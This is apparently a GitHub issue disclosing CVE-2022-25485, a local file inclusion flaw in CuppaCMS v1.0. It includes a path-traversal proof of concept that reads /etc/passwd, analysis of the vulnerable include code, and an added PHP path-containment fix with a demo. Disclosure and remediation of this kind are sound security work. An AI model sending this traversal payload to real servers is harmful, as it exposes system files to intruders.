Headline
CVE-2022-25485: Unauthorized local file inclusion (LFI) vulnerability exists via the url parameter in /alerts/alertLightbox.php · Issue #24 · CuppaCMS/CuppaCMS
CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php.
Product version: CuppaCMS v1.0 http://cuppacms.com/files/cuppa_cms.zip
PoC
POST /alerts/alertLightbox.php
url=../../../../../../../../../../../etc/passwd
Analysis
Location: alerts/alertLightbox.php, line 113
<?php include $cuppa->getDocumentPath().@$cuppa->POST("url");
and $cuppa->POST:
// post
public function POST($string){
    return $this->sanitizeString(@$_POST[$string]);
}
Going on:
public function sanitizeString($string){
    return htmlspecialchars(trim(@$string));
}
So the POST url parameter is used without any LFI protection filter.
Repair suggestions
You can check url; for example, check if it has … and then refuse the request.
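
One way to implement the check suggested above, as an added example that is not CuppaCMS code: resolve the requested path and refuse anything that lands outside a base directory. The helper name resolveInclude and the temporary demo directory are hypothetical; the traversal string is the one from the PoC.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical helper (not part of CuppaCMS): map a user-supplied relative
 * path to a file under $baseDir, or return null if the request must be refused.
 */
function resolveInclude(string $baseDir, string $userPath): ?string
{
    // Refuse empty input and NUL bytes before touching the filesystem.
    if ($userPath === '' || strpos($userPath, "\0") !== false) {
        return null;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }

    // realpath() collapses "../" segments and follows symlinks; it returns
    // false when the target does not exist.
    $target = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($target === false || !is_file($target)) {
        return null;
    }

    // Containment check: the resolved path must stay below the base directory.
    // The trailing separator stops "/srv/app-old" from matching "/srv/app".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed demo: a temporary directory stands in for the document path.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lfi_demo_' . bin2hex(random_bytes(4));
mkdir($root . DIRECTORY_SEPARATOR . 'alerts', 0700, true);
file_put_contents($root . '/alerts/ok.php', '<?php echo "ok";');

$payload = '../../../../../../../../../../../etc/passwd';

// htmlspecialchars(trim()) only encodes HTML metacharacters, so the
// traversal string reaches include unchanged.
printf("sanitizer changed payload: %s\n", var_export(htmlspecialchars(trim($payload)) !== $payload, true));
printf("traversal resolved to:     %s\n", var_export(resolveInclude($root, $payload), true));
printf("in-tree file resolved to:  %s\n", var_export(resolveInclude($root, 'alerts/ok.php'), true));
```

The caller would include only the returned path and answer with an error when the helper returns null; a fixed allowlist of includable files is stricter still.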